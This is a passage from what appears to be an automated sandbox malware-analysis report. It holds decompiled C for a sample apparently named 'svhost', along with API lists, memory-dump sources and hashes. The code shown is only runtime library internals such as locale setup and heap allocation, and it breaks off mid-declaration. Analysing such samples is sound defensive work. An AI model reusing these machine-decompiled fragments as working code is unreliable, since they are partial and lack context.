                                      						_v77 = 1;
                                      					}
                                      					_v8 = 0;
                                      					E00E55250();
                                      					_v76 = 0;
                                      					_v8 = 0xffffffff;
                                      					E00E55300( &_v76);
                                      				}
                                      				if((_v77 & 0x000000ff) != 0) {
                                      					_t100 =  *((intOrPtr*)( *((intOrPtr*)(_v84 + 4))));
                                      					_v92 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v84 + 4)))) + 8))))();
                                      					_v88 = _v92;
                                      					if(_v88 == 0) {
                                      						_v96 = 0;
                                      					} else {
                                      						_t100 =  *((intOrPtr*)( *_v88));
                                      						_v96 =  *((intOrPtr*)( *((intOrPtr*)( *_v88))))(1);
                                      					}
                                      					E00E72801("bad locale name");
                                      				}
                                      				 *[fs:0x0] = _v16;
                                      				return E00E89A35(_t76, _v20 ^ _t107, _t100, _t105, _t106);
                                      			}

                                      APIs
                                      • std::locale::_Init.LIBCPMT ref: 00E55381
                                        • Part of subcall function 00E76652: __EH_prolog3.LIBCMT ref: 00E76659
                                        • Part of subcall function 00E76652: std::_Lockit::_Lockit.LIBCPMT ref: 00E76664
                                        • Part of subcall function 00E76652: std::locale::_Setgloballocale.LIBCPMT ref: 00E7667F
                                        • Part of subcall function 00E76652: std::_Lockit::~_Lockit.LIBCPMT ref: 00E766D5
                                        • Part of subcall function 00E55180: std::_Lockit::_Lockit.LIBCPMT ref: 00E551AB
                                        • Part of subcall function 00E55180: _Yarn.LIBCPMTD ref: 00E551BD
                                        • Part of subcall function 00E55180: _Yarn.LIBCPMTD ref: 00E551CC
                                        • Part of subcall function 00E55180: _Yarn.LIBCPMTD ref: 00E551DB
                                        • Part of subcall function 00E55180: _Yarn.LIBCPMTD ref: 00E551EA
                                        • Part of subcall function 00E55180: _Yarn.LIBCPMTD ref: 00E551F9
                                        • Part of subcall function 00E55180: _Yarn.LIBCPMTD ref: 00E55208
                                      • std::_Locinfo::~_Locinfo.LIBCPMTD ref: 00E55422
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Yarn$std::_$Lockit$Lockit::_std::locale::_$H_prolog3InitLocinfoLocinfo::~_Lockit::~_Setgloballocale
                                      • String ID: bad locale name
                                      • API String ID: 3202388342-1405518554
                                      • Opcode ID: c036ee8f65957072bd62ffe21eed5ac8671abed7723df8b9a0461b3a65aa67c3
                                      • Instruction ID: ff4823a4dfd29f2fb7bd2e06a222f068b6c9c65ec7bd2f4df1b56d8273794157
                                      • Opcode Fuzzy Hash: c036ee8f65957072bd62ffe21eed5ac8671abed7723df8b9a0461b3a65aa67c3
                                      • Instruction Fuzzy Hash: 7B415C75A00648DFCB04DFD4C991BADB7F1BF48305F108559E81A6B395DB74AE49CB80
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      C-Code - Quality: 71%
                                      			E00EA467D(void* __ecx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8) {
                                      				char _v8;
                                      				char _v28;
                                      				char _v32;
                                      				void* _v41;
                                      				char _v48;
                                      				char _v52;
                                      				char* _v56;
                                      				char _v60;
                                      				void* __ebp;
                                      				void* _t20;
                                      				void* _t24;
                                      				void* _t25;
                                      				char _t30;
                                      				void* _t34;
                                      				void* _t36;
                                      				void* _t39;
                                      				void* _t47;
                                      				void* _t53;
                                      				void* _t54;
                                      
                                      				_t49 = __esi;
                                      				_push(__ecx);
                                      				if(_a8 != 0) {
                                      					_push(__esi);
                                      					_push(__edi);
                                      					_t47 = 0;
                                      					_t20 = E00EB082A( &_v8, 0, 0, _a8, 0x7fffffff);
                                      					_t54 = _t53 + 0x14;
                                      					__eflags = _t20;
                                      					if(_t20 == 0) {
                                      						L5:
                                      						_t49 = E00EB04C2(_v8, 2);
                                      						_pop(_t39);
                                      						__eflags = _t49;
                                      						if(_t49 == 0) {
                                      							L11:
                                      							E00EB051F(_t49);
                                      							return _t47;
                                      						} else {
                                      							_t24 = E00EB082A(_t47, _t49, _v8, _a8, 0xffffffff);
                                      							_t54 = _t54 + 0x14;
                                      							__eflags = _t24;
                                      							if(_t24 == 0) {
                                      								_t25 = E00EAE8FD(_t39, _a4, _t49); // executed
                                      								_t47 = _t25;
                                      								goto L11;
                                      							} else {
                                      								__eflags = _t24 - 0x16;
                                      								if(_t24 == 0x16) {
                                      									goto L12;
                                      								} else {
                                      									__eflags = _t24 - 0x22;
                                      									if(_t24 == 0x22) {
                                      										goto L12;
                                      									} else {
                                      										goto L11;
                                      									}
                                      								}
                                      							}
                                      						}
                                      					} else {
                                      						__eflags = _t20 - 0x16;
                                      						if(_t20 == 0x16) {
                                      							L12:
                                      							_push(_t47);
                                      							_push(_t47);
                                      							_push(_t47);
                                      							_push(_t47);
                                      							_push(_t47);
                                      							E00EA4980();
                                      							asm("int3");
                                      							E00EB192F();
                                      							_v60 =  &_v32;
                                      							_v56 =  &_v28;
                                      							_t30 = 4;
                                      							_v48 = _t30;
                                      							_v52 = _t30;
                                      							_push( &_v48);
                                      							_push( &_v60);
                                      							_push( &_v52); // executed
                                      							_t34 = E00EA44BE(_t36, _t47, _t49, __eflags); // executed
                                      							return _t34;
                                      						} else {
                                      							__eflags = _t20 - 0x22;
                                      							if(_t20 == 0x22) {
                                      								goto L12;
                                      							} else {
                                      								goto L5;
                                      							}
                                      						}
                                      					}
                                      				} else {
                                      					return E00EAE8FD(__ecx, _a4, 0);
                                      				}
                                      			}

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: __cftoe$_free
                                      • String ID:
                                      • API String ID: 1303422935-0
                                      • Opcode ID: b6cc7532890766a9f049ea20fd37b1357cb9dad976b8099125afae3939dffc56
                                      • Instruction ID: c5fe4e3d2e573709696b0a87fbdcf28ea868a9900f98492dd244e6ed158e144e
                                      • Opcode Fuzzy Hash: b6cc7532890766a9f049ea20fd37b1357cb9dad976b8099125afae3939dffc56
                                      • Instruction Fuzzy Hash: CB21C7B28002087ACF259A99DC45EDF7BE9DFCB324F215167F515FA1C1EB70EA008A91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      C-Code - Quality: 76%
                                      			E00E554B0(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                      				intOrPtr _v8;
                                      				char _v16;
                                      				intOrPtr _v20;
                                      				char _v44;
                                      				void* __ebp;
                                      				signed int _t17;
                                      				void* _t27;
                                      				void* _t37;
                                      				void* _t38;
                                      				signed int _t39;
                                      
                                      				_t38 = __esi;
                                      				_t37 = __edi;
                                      				_t27 = __ebx;
                                      				_push(0xffffffff);
                                      				_push(0xebfdd8);
                                      				_push( *[fs:0x0]);
                                      				_t17 =  *0xeef074; // 0x221cac15
                                      				_push(_t17 ^ _t39);
                                      				 *[fs:0x0] =  &_v16;
                                      				_v20 = __ecx;
                                      				 *((intOrPtr*)(_v20 + 4)) = E00E767E7(__eflags, 0);
                                      				_t44 = _a4;
                                      				if(_a4 == 0) {
                                      					E00E72801("bad locale name");
                                      				}
                                      				E00E58000(_t27,  &_v44, _t37, _t38, _t44, _a4);
                                      				_v8 = 0;
                                      				E00E55350(_t27, _v20, _t37, _t38,  &_v44, _a8); // executed
                                      				_v8 = 0xffffffff;
                                      				E00E57F50( &_v44);
                                      				 *[fs:0x0] = _v16;
                                      				return _v20;
                                      			}

                                      APIs
                                        • Part of subcall function 00E767E7: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00E767FF
                                      • task.LIBCPMTD ref: 00E55525
                                        • Part of subcall function 00E72801: std::bad_exception::bad_exception.LIBCMTD ref: 00E7280D
                                        • Part of subcall function 00E72801: __CxxThrowException@8.LIBVCRUNTIME ref: 00E7281B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Exception@8LocimpLocimp::_Throwstd::bad_exception::bad_exceptionstd::locale::_task
                                      • String ID: bad locale name
                                      • API String ID: 3971965024-1405518554
                                      • Opcode ID: ace96de1e10e239dad896438d8bf640c754e8dea3b562b436f171719bd05fced
                                      • Instruction ID: c294ad7c84c9e22943c0e6de97d2b36adad5eae1baadc9bd02e2e0e064c37abb
                                      • Opcode Fuzzy Hash: ace96de1e10e239dad896438d8bf640c754e8dea3b562b436f171719bd05fced
                                      • Instruction Fuzzy Hash: 440140B6904608EBCB04EF94D851BDEB7B4FB18725F109669F8257B3C0DB316908CBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      C-Code - Quality: 73%
                                      			E00E64440(intOrPtr _a4, intOrPtr _a8) {
                                      				intOrPtr _v8;
                                      				char _v16;
                                      				intOrPtr _v20;
                                      				intOrPtr _v24;
                                      				intOrPtr* _v28;
                                      				signed int _v32;
                                      				intOrPtr* _v36;
                                      				intOrPtr* _v40;
                                      				intOrPtr _v44;
                                      				intOrPtr _v48;
                                      				intOrPtr _v52;
                                      				intOrPtr* _v56;
                                      				signed int _v60;
                                      				intOrPtr _v64;
                                      				intOrPtr _v68;
                                      				intOrPtr _v72;
                                      				void* __ebx;
                                      				void* __ecx;
                                      				void* __edi;
                                      				void* __esi;
                                      				signed int _t81;
                                      				void* _t92;
                                      				intOrPtr _t95;
                                      				void* _t117;
                                      				intOrPtr* _t119;
                                      				signed int _t161;
                                      				void* _t166;
                                      				void* _t168;
                                      				signed int _t170;
                                      				void* _t171;
                                      
                                      				_push(0xffffffff);
                                      				_push(0xec0f80);
                                      				_push( *[fs:0x0]);
                                      				_push(_t119);
                                      				_push(_t117);
                                      				_push(_t168);
                                      				_push(_t166);
                                      				_t81 =  *0xeef074; // 0x221cac15
                                      				_push(_t81 ^ _t170);
                                      				 *[fs:0x0] =  &_v16;
                                      				_v20 = _t171 - 0x34;
                                      				_v28 = _t119;
                                      				_v48 = E00E56580(_v28);
                                      				_v56 = _v28;
                                      				_v36 = _v56;
                                      				_v40 = _v56 + 4;
                                      				asm("cdq");
                                      				_v32 = (_a4 -  *_v36) / 0x18;
                                      				asm("cdq");
                                      				_v60 = ( *_v40 -  *_v36) / 0x18;
                                      				_t92 = E00E651D0(_v28);
                                      				_t176 = _v60 - _t92;
                                      				if(_v60 == _t92) {
                                      					E00E5BC70();
                                      				}
                                      				_v68 = _v60 + 1;
                                      				_v52 = E00E65110(_v28, _v60 + 1, _t176, _v68);
                                      				_t95 = E00E65210(_v48, _v52); // executed
                                      				_v24 = _t95;
                                      				_t39 = 0x18 + _v32 * 0x18; // 0x117
                                      				_v64 = _v24 + _t39;
                                      				_v44 = _v64;
                                      				_v8 = 0;
                                      				_v72 = E00E51650(_v32 * 0x18 + _v24);
                                      				E00E64410(_a8, _v48, _v72, E00E51650(_a8));
                                      				_v44 = _v32 * 0x18 + _v24;
                                      				if(_a4 !=  *_v40) {
                                      					E00E651A0(_t117, _v28, _t166, _t168, __eflags,  *_v36, _a4, _v24);
                                      					_v44 = _v24;
                                      					_t161 = _v32 * 0x18;
                                      					__eflags = _t161;
                                      					_t68 = _t161 + 0x18; // 0x117
                                      					E00E651A0(_t117, _v28, _t166, _t168, _t161, _a4,  *_v40, _v24 + _t68);
                                      				} else {
                                      					E00E65170(_v28,  *_v36,  *_v40, _v24);
                                      				}
                                      				_v8 = 0xffffffff;
                                      				E00E65070(_v28, _v24, _v68, _v52);
                                      				 *[fs:0x0] = _v16;
                                      				return _v32 * 0x18 + _v24;
                                      			}

                                      APIs
                                        • Part of subcall function 00E651D0: _Min_value.LIBCPMTD ref: 00E651FD
                                      • allocator.LIBCONCRTD ref: 00E644EC
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Min_valueallocator
                                      • String ID:
                                      • API String ID: 2162267568-0
                                      • Opcode ID: 39d18d36d12dcad7ef3e2a9381b062326ba9025c1eeffcdf089bb6dd5cc136ac
                                      • Instruction ID: 979179be999aaeafbe953bb72d5288921d7b718f5237b073623d650edc65c68e
                                      • Opcode Fuzzy Hash: 39d18d36d12dcad7ef3e2a9381b062326ba9025c1eeffcdf089bb6dd5cc136ac
                                      • Instruction Fuzzy Hash: A651C6B5E011099FCB08DF98E991AAEB7F5FF89340F105129E516B7391DA30A941CFA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _free
                                      • String ID:
                                      • API String ID: 269201875-0
                                      • Opcode ID: 5fd3ffb4337677bc49f9e788a487415ad42022b0d8fdbeb87e209f55cb08be17
                                      • Instruction ID: a5be9a76a5c509995f5cb9d7d6e221a25160c5fadb68a619e7cbaab8f0615bfa
                                      • Opcode Fuzzy Hash: 5fd3ffb4337677bc49f9e788a487415ad42022b0d8fdbeb87e209f55cb08be17
                                      • Instruction Fuzzy Hash: 76315C76A04614DF8B14DF59C8C485DB7F2FF8E32072686A5E516BB7A0C330AD05CB91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      C-Code - Quality: 82%
                                      			E00EAE032(void* __ebx, intOrPtr* __ecx, void* __eflags) {
                                      				void* _v5;
                                      				char _v12;
                                      				char _v16;
                                      				intOrPtr _v20;
                                      				intOrPtr _v24;
                                      				intOrPtr _v28;
                                      				intOrPtr _v32;
                                      				char _v36;
                                      				void* __edi;
                                      				void* __esi;
                                      				void* __ebp;
                                      				intOrPtr _t16;
                                      				void* _t17;
                                      				char _t23;
                                      				void* _t27;
                                      				intOrPtr* _t32;
                                      				intOrPtr _t33;
                                      
                                      				_t32 = __ecx;
                                      				_t16 = E00EB04C2(1, 0xb8);
                                      				_t31 =  *_t32;
                                      				_t33 = _t16;
                                      				 *((intOrPtr*)( *_t32)) = _t33;
                                      				_t17 = E00EB051F(0);
                                      				_t37 = _t33;
                                      				if(_t33 != 0) {
                                      					_v36 =  *_t32;
                                      					_v32 =  *((intOrPtr*)(_t32 + 4));
                                      					_v28 =  *((intOrPtr*)(_t32 + 8));
                                      					_v24 =  *((intOrPtr*)(_t32 + 0xc));
                                      					_v20 =  *((intOrPtr*)(_t32 + 0x10));
                                      					_t23 = 4;
                                      					_v12 = _t23;
                                      					_v16 = _t23;
                                      					_push( &_v12);
                                      					_push( &_v36);
                                      					_push( &_v16); // executed
                                      					_t27 = E00EADEFD(__ebx, _t31, _t32, _t33, _t37); // executed
                                      					return _t27;
                                      				}
                                      				return _t17;
                                      			}

                                      APIs
                                        • Part of subcall function 00EB04C2: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00EB109F,00000001,00000364,00000006,000000FF,?,00000000,?,00EA5F5C,00EB059C), ref: 00EB0503
                                      • _free.LIBCMT ref: 00EAE052
                                        • Part of subcall function 00EB051F: HeapFree.KERNEL32(00000000,00000000,?,00EB7F92,?,00000000,?,?,?,00EB8235,?,00000007,?,?,00EB8728,?), ref: 00EB0535
                                        • Part of subcall function 00EB051F: GetLastError.KERNEL32(?,?,00EB7F92,?,00000000,?,?,?,00EB8235,?,00000007,?,?,00EB8728,?,?), ref: 00EB0547
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateErrorFreeLast_free
                                      • String ID:
                                      • API String ID: 314386986-0
                                      • Opcode ID: 801d678e76173649f3dd5ff748fecab96b591a1307d7242ff046506c322a9187
                                      • Instruction ID: b073038beeaa57dcd4862c77fd4f36c5a0543545bed89a24f228f29abad5af73
                                      • Opcode Fuzzy Hash: 801d678e76173649f3dd5ff748fecab96b591a1307d7242ff046506c322a9187
                                      • Instruction Fuzzy Hash: 03010CB6D00219AFCB50DFA9C841ADEBBF8FB48710F104526EA14EB340E770AA44CBD0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      C-Code - Quality: 100%
                                      			E00EB04C2(signed int _a4, signed int _a8) {
                                      				void* _t8;
                                      				signed int _t13;
                                      				signed int _t18;
                                      				long _t19;
                                      
                                      				_t18 = _a4;
                                      				if(_t18 == 0) {
                                      					L2:
                                      					_t19 = _t18 * _a8;
                                      					if(_t19 == 0) {
                                      						_t19 = _t19 + 1;
                                      					}
                                      					while(1) {
                                      						_t8 = RtlAllocateHeap( *0xef3a68, 8, _t19); // executed
                                      						if(_t8 != 0) {
                                      							break;
                                      						}
                                      						__eflags = E00EAF602();
                                      						if(__eflags == 0) {
                                      							L8:
                                      							 *((intOrPtr*)(E00EA5F57(__eflags))) = 0xc;
                                      							__eflags = 0;
                                      							return 0;
                                      						}
                                      						__eflags = E00EAD114(__eflags, _t19);
                                      						if(__eflags == 0) {
                                      							goto L8;
                                      						}
                                      					}
                                      					return _t8;
                                      				}
                                      				_t13 = 0xffffffe0;
                                      				if(_t13 / _t18 < _a8) {
                                      					goto L8;
                                      				}
                                      				goto L2;
                                      			}


                                      APIs
                                      • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00EB109F,00000001,00000364,00000006,000000FF,?,00000000,?,00EA5F5C,00EB059C), ref: 00EB0503
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AllocateHeap
                                      • String ID:
                                      • API String ID: 1279760036-0
                                      • Opcode ID: 7be7086d2a6d9dd7eb920ee66fdd29965463d7d0cbbf4d9709bdb6ce82673e1c
                                      • Instruction ID: 7280d8a6f63bc0c7bb9e93249a03488a6a081340a5d427119200536b4e72d20e
                                      • Opcode Fuzzy Hash: 7be7086d2a6d9dd7eb920ee66fdd29965463d7d0cbbf4d9709bdb6ce82673e1c
                                      • Instruction Fuzzy Hash: C2F0E9312465256BDB315B629C05EDF37889F817A0B14A061F919FB890DA30FD04CBE0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 706 eb0559-eb0565 707 eb0597-eb05a2 call ea5f57 706->707 708 eb0567-eb0569 706->708 716 eb05a4-eb05a6 707->716 710 eb056b-eb056c 708->710 711 eb0582-eb0593 RtlAllocateHeap 708->711 710->711 712 eb056e-eb0575 call eaf602 711->712 713 eb0595 711->713 712->707 718 eb0577-eb0580 call ead114 712->718 713->716 718->707 718->711
                                      C-Code - Quality: 100%
                                      			E00EB0559(long _a4) {
                                      				void* _t4;
                                      				long _t8;
                                      
                                      				_t8 = _a4;
                                      				if(_t8 > 0xffffffe0) {
                                      					L7:
                                      					 *((intOrPtr*)(E00EA5F57(__eflags))) = 0xc;
                                      					__eflags = 0;
                                      					return 0;
                                      				}
                                      				if(_t8 == 0) {
                                      					_t8 = _t8 + 1;
                                      				}
                                      				while(1) {
                                      					_t4 = RtlAllocateHeap( *0xef3a68, 0, _t8); // executed
                                      					if(_t4 != 0) {
                                      						break;
                                      					}
                                      					__eflags = E00EAF602();
                                      					if(__eflags == 0) {
                                      						goto L7;
                                      					}
                                      					__eflags = E00EAD114(__eflags, _t8);
                                      					if(__eflags == 0) {
                                      						goto L7;
                                      					}
                                      				}
                                      				return _t4;
                                      			}


                                      APIs
                                      • RtlAllocateHeap.NTDLL(00000000,00000000,?,?,00E89C45,00000000,?,00E5166C,00000000,?,00E5B6DC,00000000), ref: 00EB058B
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AllocateHeap
                                      • String ID:
                                      • API String ID: 1279760036-0
                                      • Opcode ID: ce10f44c04375938c5af1090ce55108e93512b09565b1fdef7b78c7dcd4320e7
                                      • Instruction ID: fa0692eaab87e8593601129e132a61d13cb84bfbd15fea32427914a7d6bbe1fc
                                      • Opcode Fuzzy Hash: ce10f44c04375938c5af1090ce55108e93512b09565b1fdef7b78c7dcd4320e7
                                      • Instruction Fuzzy Hash: 6EE06571207715ABD63126A69C05BEF7A8C9F867A4F156121BC4AB6C91CB20FD40CAE1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 79%
                                      			E00E6F730(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8) {
                                      				char _v16;
                                      				signed int _v20;
                                      				char _v44;
                                      				signed int* _v48;
                                      				signed int* _v52;
                                      				signed int _v56;
                                      				void* _v60;
                                      				void* _v64;
                                      				void* _v68;
                                      				void* _v72;
                                      				void* _v76;
                                      				void* _v80;
                                      				void* _v84;
                                      				void* _v88;
                                      				void* _v92;
                                      				signed int* _v96;
                                      				signed int _v100;
                                      				char _v101;
                                      				signed int _v102;
                                      				char _v103;
                                      				signed int _v104;
                                      				char _v105;
                                      				char _v106;
                                      				char _v107;
                                      				char _v108;
                                      				char _v109;
                                      				char _v110;
                                      				char _v111;
                                      				char _v112;
                                      				char _v113;
                                      				char _v114;
                                      				char _v115;
                                      				char _v116;
                                      				char _v117;
                                      				char _v118;
                                      				char _v119;
                                      				char _v120;
                                      				char _v121;
                                      				char _v122;
                                      				char _v123;
                                      				void* _v128;
                                      				intOrPtr _v132;
                                      				void* _v136;
                                      				char _v140;
                                      				char _v144;
                                      				char _v148;
                                      				char _v152;
                                      				char _v156;
                                      				char _v160;
                                      				char _v164;
                                      				char _v168;
                                      				char _v172;
                                      				intOrPtr _v176;
                                      				intOrPtr _v180;
                                      				intOrPtr _v184;
                                      				intOrPtr _v188;
                                      				intOrPtr _v192;
                                      				intOrPtr _v196;
                                      				intOrPtr _v200;
                                      				intOrPtr _v204;
                                      				intOrPtr _v208;
                                      				intOrPtr _v212;
                                      				intOrPtr _v216;
                                      				intOrPtr _v220;
                                      				intOrPtr _v224;
                                      				intOrPtr _v228;
                                      				intOrPtr _v232;
                                      				intOrPtr _v236;
                                      				intOrPtr _v240;
                                      				intOrPtr _v244;
                                      				intOrPtr _v248;
                                      				intOrPtr _v252;
                                      				intOrPtr _v256;
                                      				intOrPtr _v260;
                                      				intOrPtr _v264;
                                      				intOrPtr _v268;
                                      				intOrPtr _v272;
                                      				intOrPtr _v276;
                                      				intOrPtr _v280;
                                      				intOrPtr _v284;
                                      				char _v300;
                                      				char _v316;
                                      				char _v332;
                                      				char _v348;
                                      				char _v364;
                                      				char _v380;
                                      				char _v396;
                                      				char _v420;
